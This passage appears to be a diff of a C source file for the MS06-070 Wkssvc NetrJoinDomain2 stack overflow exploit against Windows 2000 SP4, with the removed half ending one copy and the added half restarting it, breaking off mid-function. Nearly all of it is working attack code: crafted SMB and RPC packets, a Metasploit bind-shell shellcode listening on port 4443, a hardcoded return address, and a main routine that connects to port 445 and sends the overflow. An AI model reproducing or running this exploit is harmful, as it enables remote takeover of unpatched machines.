-"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
-"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
-"\x3f\x00";
-
-
-unsigned char NTCreate_AndX_Request[]=
-"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
-"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
-"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
-"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
-
-
-unsigned char Rpc_Bind_Wkssvc[]=
-"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
-"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
-"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
-"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
-"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
-"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
-"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
-"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
-
-
-unsigned char Rpc_NetrJoinDomain2_Header[]=
-"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
-"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
-"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
-"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
-"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
-"\x00\x00\x00\x00"
-"\x16\x00"     //opnum,NetrJoinDomain2
-"\x30\x2a\x42\x00"
-"\x0e\x00\x00\x00"
-"\x00\x00\x00\x00"
-"\x0e\x00\x00\x00"
-"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
-"\x00\x00"
-"\x10\x01\x00\x00"
-"\x00\x00\x00\x00"
-"\x10\x01\x00\x00";
-
-
-unsigned char Rpc_NetrJoinDomain2_End[]=
-"\x00\x00\x00\x00"
-"\x00\x00\x00\x00"
-"\x00\x00\x00\x00"
-"\x01\x00\x00\x00";
-
-
-unsigned char *lpDomainName=NULL;
-DWORD   dwDomainNameLen=0;
-
-
-
-/* win32_bind -  EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
-unsigned char shellcode[] =
-"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe9"
-"\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83\x01\xa0\xdc\x31"
-"\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2\x5f\xcb\x91\x58\xcc\x45"
-"\xa6\x41\xa8\x91\xc9\x58\xc8\x87\x62\x6d\xa8\xcf\x07\x68\xe3\x57"
-"\x45\xdd\xe3\xba\xee\x98\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6"
-"\x9c\xbc\xa8\x91\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25"
-"\xea\x75\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
-"\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57\xcf\x9e"
-"\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc\xb6\x0d\xdc\x1e"
-"\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0\xc6\xa8\x68\xb4\x2b\xcc"
-"\xbc\x33\x21\x31\x39\x31\xfa\xc7\x1c\xf4\x74\x31\x3f\x0a\x70\x9d"
-"\xba\x0a\x60\x9d\xaa\x0a\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f"
-"\x7c\x31\x87\xd4\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6"
-"\x4d\xf4\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
-"\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f\x5a\x99"
-"\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3\x60\xbc\x49\x9e"
-"\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68\xe3\x3d\x43\xa7\x61\xe3"
-"\x17\x1b\x0f\x5d\x64\x23\x1b\x65\x42\xf2\x4b\xbc\x17\xea\x35\x31"
-"\x9c\x1d\xdc\x18\xb2\x0e\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f"
-"\x16\x89\x4b\x63\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e"
-"\x62\x0e\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
-"\xba\xa6\xf5\x31\x39\x59\x23\xce";
-
-
-DWORD    fill_len_1 =0x84c;     //fill data
-DWORD    fill_len_2 =0x1000;    //fill rubbish data
-DWORD    addr_jmp_ebx=0x77F92A9B;   //jmp ebx address,in ntdll.dll
-unsigned char  code_jmp8[]=      //jmp 8
-"\xEB\x06\x90\x90";
-
-unsigned char  *Rpc_NetrJoinDomain2=NULL;
-DWORD    dwRpc_NetrJoinDomain2=0;
-
-
-unsigned char  recvbuff[2048];
-
-
-void showinfo(void)
-{
- printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
- printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
- printf("page:http://ruder.cdut.net/default.asp\n\n");
- printf("Code fixed by S A Stevens - 16.11.2006\n");
- printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
- printf("usage:\n");
- printf("ms06070 targetip DomainName\n\n");
- printf("notice:\n");
- printf("Make sure the DomainName is valid and live,more informations see\n");
- printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
- printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
-
-}
-
-void neg ( int s )
-{
- char response[1024];
-
- memset(response,0,sizeof(response));
-
- send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
-}
-
-
-
-void MakeAttackPacket(char *lpDomainNameStr)
-{
- DWORD  j,len,b_flag;
-
-
-
- dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
- lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
-
- memset(lpDomainName,0,dwDomainNameLen);
-
-MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
-
- *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
- *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
-
- len=dwDomainNameLen+     //DomainName
- fill_len_1-3*2+      //fill_len_1
- 4+         //jmp 8
- 4+         //addr jmp ebx
- sizeof(shellcode)-1+    //shellcode
- fill_len_2+       //fill_len_2
- 2;         //0x0000
-
- b_flag=0;
- if (len%2==1)
- {
- len++;
- b_flag=1;
- }
-
-
- dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
-       len+
-       sizeof(Rpc_NetrJoinDomain2_End)-1; //end
-
-
- //malloc
- Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
- if (Rpc_NetrJoinDomain2==NULL)
- {
- printf("malloc error!\n");
- return;
- }
-
- //fill nop
- memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
-
-
- j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
-
- //update para1 length
- *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
- *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
-
-
- //copy header
-
-memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
-
- j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
-
- //copy DomainName
- memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
- j=j+dwDomainNameLen;
-
- //calculate offset
- j=j+fill_len_1-3*2;
-
- //jmp 8
- memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
- j=j+4;
-
- //jmp ebx address
- *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
- j=j+4;
-
- //copy shellcode
- memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
- j=j+sizeof(shellcode)-1;
-
- //fill data
- memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
- j=j+fill_len_2;
-
- //0x0000(NULL)
- if (b_flag==0)
- {
- Rpc_NetrJoinDomain2[j]=0x00;
- Rpc_NetrJoinDomain2[j+1]=0x00;
- j=j+2;
- }
- else if (b_flag==1)
- {
- Rpc_NetrJoinDomain2[j]=0x00;
- Rpc_NetrJoinDomain2[j+1]=0x00;
- Rpc_NetrJoinDomain2[j+2]=0x00;
- j=j+3;
- }
-
-
- //copy other parameter
-
-memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
-
- j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
-
-
-}
-
-
-
-void main(int argc,char **argv)
-{
- WSADATA    ws;
- struct sockaddr_in server;
-   SOCKET    sock;
- DWORD    ret;
- WORD    userid,treeid,fid;
-
-
- WSAStartup(MAKEWORD(2,2),&ws);
-
-
-
-
-   sock = socket(AF_INET,SOCK_STREAM,0);
-   if(sock<=0)
- {
-       return;
- }
-
-   server.sin_family = AF_INET;
-   server.sin_addr.s_addr = inet_addr(argv[1]);
-   server.sin_port = htons((USHORT)445);
-
- printf("[+] Connecting %s\n",argv[1]);
-
-   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
- if (ret==-1)
- {
- printf("Connection Error, Port 445 Firewalled?\n");
- return;
- }
-
-
- neg(sock);
-
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
- ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
- if (ret<=0)
- {
- printf("send Session_Setup_AndX_Request error!\n");
- return;
- }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
- userid=*(WORD *)(recvbuff+0x20);       //get userid
-
-
- memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
-
-
- ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
- if (ret<=0)
- {
- printf("send TreeConnect_AndX_Request error!\n");
- return;
- }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
- treeid=*(WORD *)(recvbuff+0x1c);       //get treeid
-
-
- //send NTCreate_AndX_Request
- memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
- memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid
-
-
- ret=send(sock,(char
-*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
- if (ret<=0)
- {
- printf("send NTCreate_AndX_Request error!\n");
- return;
- }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-
- fid=*(WORD *)(recvbuff+0x2a);        //get fid
-
-
- //rpc bind
-
- memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
- memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
- memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
- *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
-
- ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
- if (ret<=0)
- {
- printf("send Rpc_Bind_Wkssvc error!\n");
- return;
- }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-
- MakeAttackPacket((char *)argv[2]);
-
-
- memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
- memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
- memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
- *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
-
- *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length
-
- ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
- if (ret<=0)
- {
- printf("send Rpc_NetrJoinDomain2 error!\n");
- return;
- }
-
- printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n",argv[1]);
-
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-
-
-
- closesocket(sock);
-
-}
-
-// milw0rm.com [2006-11-17]
+/***************************************************************************
+
+Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
+
+by cocoruder(frankruder_at_hotmail.com),2006.11.15
+page:http://ruder.cdut.net/default.asp
+
+Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
+correct jmp EBX address and fixed exploit output status.
+
+Greetz to InTel
+
+Should work on Windows 2000 Server SP4 (All Languages)
+
+
+usage:
+ms06070 targetip DomainName
+
+notice:
+Make sure the DomainName is valid and live,more informations see
+http://research.eeye.com/html/advisories/published/AD20061114.html,
+cocoruder just research the vulnerability and give the exploit for
+Win2000.
+****************************************************************************/
+
+
+#include <stdio.h>
+#include <windows.h>
+#include <winsock.h>
+#include <tchar.h>
+#pragma comment(lib, "wsock32.lib")
+
+
+unsigned char SmbNeg[] =
+"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
+"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
+
+
+unsigned char Session_Setup_AndX_Request[]=
+"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
+"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
+"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
+"\x62\x00";
+
+
+unsigned char TreeConnect_AndX_Request[]=
+"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
+"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
+"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
+"\x3f\x00";
+
+
+unsigned char NTCreate_AndX_Request[]=
+"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
+"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
+"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
+"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
+
+
+unsigned char Rpc_Bind_Wkssvc[]=
+"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
+"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
+"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
+"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
+"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
+"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
+"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
+"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
+
+
+unsigned char Rpc_NetrJoinDomain2_Header[]=
+"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
+"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
+"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
+"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
+"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
+"\x00\x00\x00\x00"
+"\x16\x00"     //opnum,NetrJoinDomain2
+"\x30\x2a\x42\x00"
+"\x0e\x00\x00\x00"
+"\x00\x00\x00\x00"
+"\x0e\x00\x00\x00"
+"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
+"\x00\x00"
+"\x10\x01\x00\x00"
+"\x00\x00\x00\x00"
+"\x10\x01\x00\x00";
+
+
+unsigned char Rpc_NetrJoinDomain2_End[]=
+"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
+"\x01\x00\x00\x00";
+
+
+unsigned char *lpDomainName=NULL;
+DWORD   dwDomainNameLen=0;
+
+
+
+/* win32_bind -  EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
+unsigned char shellcode[] =
+"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe9"
+"\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83\x01\xa0\xdc\x31"
+"\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2\x5f\xcb\x91\x58\xcc\x45"
+"\xa6\x41\xa8\x91\xc9\x58\xc8\x87\x62\x6d\xa8\xcf\x07\x68\xe3\x57"
+"\x45\xdd\xe3\xba\xee\x98\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6"
+"\x9c\xbc\xa8\x91\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25"
+"\xea\x75\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
+"\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57\xcf\x9e"
+"\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc\xb6\x0d\xdc\x1e"
+"\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0\xc6\xa8\x68\xb4\x2b\xcc"
+"\xbc\x33\x21\x31\x39\x31\xfa\xc7\x1c\xf4\x74\x31\x3f\x0a\x70\x9d"
+"\xba\x0a\x60\x9d\xaa\x0a\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f"
+"\x7c\x31\x87\xd4\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6"
+"\x4d\xf4\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
+"\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f\x5a\x99"
+"\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3\x60\xbc\x49\x9e"
+"\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68\xe3\x3d\x43\xa7\x61\xe3"
+"\x17\x1b\x0f\x5d\x64\x23\x1b\x65\x42\xf2\x4b\xbc\x17\xea\x35\x31"
+"\x9c\x1d\xdc\x18\xb2\x0e\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f"
+"\x16\x89\x4b\x63\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e"
+"\x62\x0e\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
+"\xba\xa6\xf5\x31\x39\x59\x23\xce";
+
+
+DWORD    fill_len_1 =0x84c;     //fill data
+DWORD    fill_len_2 =0x1000;    //fill rubbish data
+DWORD    addr_jmp_ebx=0x77F92A9B;   //jmp ebx address,in ntdll.dll
+unsigned char  code_jmp8[]=      //jmp 8
+"\xEB\x06\x90\x90";
+
+unsigned char  *Rpc_NetrJoinDomain2=NULL;
+DWORD    dwRpc_NetrJoinDomain2=0;
+
+
+unsigned char  recvbuff[2048];
+
+
+void showinfo(void)
+{
+ printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
+ printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
+ printf("page:http://ruder.cdut.net/default.asp\n\n");
+ printf("Code fixed by S A Stevens - 16.11.2006\n");
+ printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
+ printf("usage:\n");
+ printf("ms06070 targetip DomainName\n\n");
+ printf("notice:\n");
+ printf("Make sure the DomainName is valid and live,more informations see\n");
+ printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
+ printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
+
+}
+
+void neg ( int s )
+{
+ char response[1024];
+
+ memset(response,0,sizeof(response));
+
+ send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
+}
+
+
+
+void MakeAttackPacket(char *lpDomainNameStr)
+{
+ DWORD  j,len,b_flag;
+
+
+
+ dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
+ lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
+
+ memset(lpDomainName,0,dwDomainNameLen);
+
+MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
+
+ *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
+ *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
+
+ len=dwDomainNameLen+     //DomainName
+ fill_len_1-3*2+      //fill_len_1
+ 4+         //jmp 8
+ 4+         //addr jmp ebx
+ sizeof(shellcode)-1+    //shellcode
+ fill_len_2+       //fill_len_2
+ 2;         //0x0000
+
+ b_flag=0;
+ if (len%2==1)
+ {
+ len++;
+ b_flag=1;
+ }
+
+
+ dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
+       len+
+       sizeof(Rpc_NetrJoinDomain2_End)-1; //end
+
+
+ //malloc
+ Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
+ if (Rpc_NetrJoinDomain2==NULL)
+ {
+ printf("malloc error!\n");
+ return;
+ }
+
+ //fill nop
+ memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
+
+
+ j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
+
+ //update para1 length
+ *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
+ *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
+
+
+ //copy header
+
+memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
+
+ j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
+
+ //copy DomainName
+ memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
+ j=j+dwDomainNameLen;
+
+ //calculate offset
+ j=j+fill_len_1-3*2;
+
+ //jmp 8
+ memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
+ j=j+4;
+
+ //jmp ebx address
+ *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
+ j=j+4;
+
+ //copy shellcode
+ memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
+ j=j+sizeof(shellcode)-1;
+
+ //fill data
+ memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
+ j=j+fill_len_2;
+
+ //0x0000(NULL)
+ if (b_flag==0)
+ {
+ Rpc_NetrJoinDomain2[j]=0x00;
+ Rpc_NetrJoinDomain2[j+1]=0x00;
+ j=j+2;
+ }
+ else if (b_flag==1)
+ {
+ Rpc_NetrJoinDomain2[j]=0x00;
+ Rpc_NetrJoinDomain2[j+1]=0x00;
+ Rpc_NetrJoinDomain2[j+2]=0x00;
+ j=j+3;
+ }
+
+
+ //copy other parameter
+
+memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
+
+ j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
+
+
+}
+
+
+
+void main(int argc,char **argv)
+{
+ WSADATA    ws;
+ struct sockaddr_in server;
+   SOCKET    sock;
+ DWORD    ret;
+ WORD    userid,treeid,fid;
+
+
+ WSAStartup(MAKEWORD(2,2),&ws);
+
+
+
+
+   sock = socket(AF_INET,SOCK_STREAM,0);
+   if(sock<=0)
+ {
+       return;
+ }
+
+   server.sin_family = AF_INET;
+   server.sin_addr.s_addr = inet_addr(argv[1]);
+   server.sin_port = htons((USHORT)445);
+
+ printf("[+] Connecting %s\n",argv[1]);
+
+   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
+ if (ret==-1)
+ {
+ printf("Connection Error, Port 445 Firewalled?\n");
+ return;
+ }
+
+
+ neg(sock);
+
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+ ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
+ if (ret<=0)
+ {
+ printf("send Session_Setup_AndX_Request error!\n");
+ return;
+ }
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+ userid=*(WORD *)(recvbuff+0x20);       //get userid
+
+
+ memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
+
+
+ ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
+ if (ret<=0)
+ {
+ printf("send TreeConnect_AndX_Request error!\n");
+ return;
+ }
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+ treeid=*(WORD *)(recvbuff+0x1c);       //get treeid
+
+
+ //send NTCreate_AndX_Request
+ memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
